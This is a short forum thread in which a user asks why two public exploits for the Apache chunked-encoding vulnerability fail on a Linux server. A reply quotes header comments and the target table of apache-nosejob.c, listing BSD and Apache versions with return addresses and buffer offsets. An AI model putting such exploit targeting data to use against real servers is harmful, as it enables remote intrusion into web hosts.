How to use the Apache Chunked-Encoding Hole?

  1. #1

    How to use the Apache Chunked-Encoding Hole?

    I see the Apache Chunked-Encoding on securityfocus.com. It posts two exploits:
    http://www.securityfocus.com/bid/5033/exploit/
    apache-scalp.c and apache-nosejob.c
    I use it, but on the Apache 1.19 Linux system it is not successful.

  2. #2
    This is correct. It shouldn't work.

    Code:
    /*
     * apache-scalp.c
     * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! 
     * 
    <snip>
    * Remote OpenBSD/Apache exploit for the "chunking" vulnerability.
    And:

    Code:
    /*
     * apache-nosejob.c - Now with FreeBSD & NetBSD targets ;>
    <snip>
    struct {
    	char *type;		/* description for newbie penetrator */
    	int delta;		/* delta thingie! */
    	u_long retaddr;		/* return address */
    	int repretaddr;		/* we repeat retaddr thiz many times in the buffer */
    	int repzero;		/* and \0'z this many times */
    } targets[] = {	// hehe, yes theo, that say OpenBSD here!
    	{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)",	 -150,	0x80f3a00, 6, 36 },
    	{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)",	 -150,	0x80a7975, 6, 36 },
    	{ "OpenBSD 3.0 x86 / Apache 1.3.20",		 -146,	0xcfa00,   6, 36 },
    	{ "OpenBSD 3.0 x86 / Apache 1.3.22",		 -146,	0x8f0aa,   6, 36 },
    	{ "OpenBSD 3.0 x86 / Apache 1.3.24",		 -146,	0x90600,   6, 36 },
    	{ "OpenBSD 3.0 x86 / Apache 1.3.24 #2",		 -146,	0x98a00,   6, 36 },
    	{ "OpenBSD 3.1 x86 / Apache 1.3.20",		 -146,	0x8f2a6,   6, 36 },
    	{ "OpenBSD 3.1 x86 / Apache 1.3.23",		 -146,	0x90600,   6, 36 },
    	{ "OpenBSD 3.1 x86 / Apache 1.3.24",		 -146,	0x9011a,   6, 36 },
    	{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2",		 -146,	0x932ae,   6, 36 },
    	{ "OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1", -146,	0x1d7a00,  6, 36 },
    	{ "NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)",	 -90,	0x80eda00,  5, 42 },
    	{ "NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)", 	 -90,   0x80efa00,  5, 42 },
    	{ "NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)", 	 -90,   0x80efa00,  5, 42 },	
    	{ "NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)",	 -90,	0x80efa00,  5, 42 }, 
    	{ "NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)",	 -90,	0x80efa00,  5, 42 },
    }, victim;
    So yes, it doesn't work on Linux. Use the source, Luke!
    Oliver's Law:
    Experience is something you don't get until just after you need it.
